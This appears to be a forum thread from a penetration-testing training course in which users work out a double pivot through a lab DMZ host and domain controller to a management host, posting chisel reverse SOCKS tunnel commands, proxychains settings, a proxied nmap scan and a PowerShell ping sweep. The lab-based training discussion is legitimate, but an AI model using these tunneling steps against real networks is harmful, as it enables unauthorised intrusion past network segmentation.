Attacking Enterprise Networks: Double Pivot using Chisel

Hello,

At the end of “Attacking Enterprise Networks” the module “Post-Exploitation” describes how to set up MSF autoroute to perform a double pivot and proxy traffic over 2 intermediate hops:

`Attack host` --> `dmz01` --> `DC01` --> `MGMT01`

I am currently trying to figure out how to perform the same task with chisel through installation of a client / server process on the DMZ jump host.
Is there anyone who has tried that out successfully?

Many thanks!

I CANNOT get it to work with meterpreter at all, I’ve been on it for ages.

3 Likes

I ended up setting up a port forward on DC01 with netsh in the end.

Tried several configuration in the Lab Environment and finally got a Chisel Double Pivot to work!

We are connecting via
Kali (10.10.14.227) <<10.10.14.0/24>> DMZ01 (10.129.58.6 | 172.16.8.120) <<192.16.8.0/24>> DC01 (172.16.8.3 | 172.16.9.3) <<172.16.9.0/24>> MGMT01 (172.16.9.25)

On our local Kali:

./chisel_linux server --socks5 -p 9001 --reverse

/etc/proxychains

socks5 127.0.0.1 9999
socks5 127.0.0.1 8888

DMZ01:

./chisel_linux client 10.10.14.227:9001 R:9999:socks
./chisel_linux server  -p 9002 --reverse --socks5 

DC01:

chisel.exe client 172.16.8.120:9002 R:8888:socks

Now close any Socks4 connection (e.g. SSH Dynamic Port Forward) and comment in /etc/proxychains

#socks4 127.0.0.1 9050

Scan Target MGMT01 via socks5 proxy:

┌──(kali㉿kali)-[~]
└─$ proxychains nmap -sT -p 22 172.16.9.25                                                    
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2022-11-11 17:27 EST
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  127.0.0.1:8888  ...  172.16.9.25:80 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:9999  ...  127.0.0.1:8888  ...  172.16.9.25:22  ...  OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 172.16.9.25
Host is up (14s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 16.31 seconds
12 Likes

This saved my bacon! Thank you! I could not get metasploit to work for some reason. I also much prefer chisel.

1 Like

Great I could help with that!
Although MSF autoroute was working for me, the connection was very instabile and it would die in regular time intervals. Then I had to do the whole setup in MSF again. With Chisel it is much less of a hassle…

Although I have not yet tried it, it should be possible to extend the chain beyond 2 hops in that configuration!

Weird part was MSF was working a couple weeks ago. But following the same steps I couldn’t ever get it to work this week. I could get everything except the connection to MGMT01 to work with MSF.

Were you able to gain access to MGMT via Meterpreter? I followed to a “T” on obtain the double hop port forward and I am getting port 22 closed for 172.16.9.25, and I do ping sweep no other IP’s are showing alive other than the DC. my question is it how I have my proxy set up that its causing this error. I cannot figure this one out. Any hint would be grateful.
thank you

Hi,
Yes, when I was doing the module 6 months ago, I was able to reach MGMT via Metasploit Autoroute.
Provided nothing has been changed in the lab setup, it should still work if you follow the exact steps shown in the module text.
However, I found this setup extremely unstable. Very often, the second reverse shell from Windows machine 1 back to the Linux Host would die (especially when using connection heavy tools such as CME). Then you have to repeat all the necessary steps to get another connection.

In short: Yes, it should work!

This post was very very helpful in my training for OSCP, thank you for your explanation. You’ve greatly improved the quality of my notes.

1 Like

This is an epic effort, great work!

Did you figure this out? I’m getting 22 closed as well, and not showing other hosts as alive…

Just wanted to say thanks for the info!! It was most definitely needed!

Thank you bro, I’m doing Dante Pro Lab right now, and there I also had to use Double Pivot, and your guide really helped :heart:

Thanks so much, was getting so frustrated with this final challenge. Always annoying when it does not work as shown in the course…

you resolved the issue man… this post be included in the course… the content in the course has alot of issues… instability and conceptual confusions…

Hey guys, I am unable to discover the last host (the one on the 172.16.9.1/24 subnet). I am using a standard pingsweep from DC01:

1..254 | ForEach-Object {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"} | Out-File -FilePath "output.txt"

With this command I am getting only a hit on 172.16.9.3 which is the DC01 host itself.
Anyone know what the problem might be?

I had the same issue. In my case I repeated the ping sweep a couple of times and worked. You should see the same additional host as in the course steps.

Generally, this specific lab is highly unstable connection-wise which in turn results multiple tries to be sure that something is not correct or the net failed.

“Stealing” the idea from our friend Rapunzel3000, you can make the metasploit setup work if you go to ‘/etc/proxychains’ and comment out the line we set up for the initial ssh pivot connection:

#socks4 127.0.0.1 8081

But do not close the SSH pivot connection. It will kill all connections using it and of course the dependent meterpreter sessions.

After that, the scan is successful (port 22 open)l and the access to the server achieved.

Hey guys, has anyone been able to run Metsasploit over the double chisel pivot? I have found that while the double chisel pivot works, many tools have a very hard time working with it. For example, burpsuite, gobuster, ffuf, metasploit. I know how to set up metasploit with a single socks proxy but I have no idea how to do 2. If anyone knows, please share.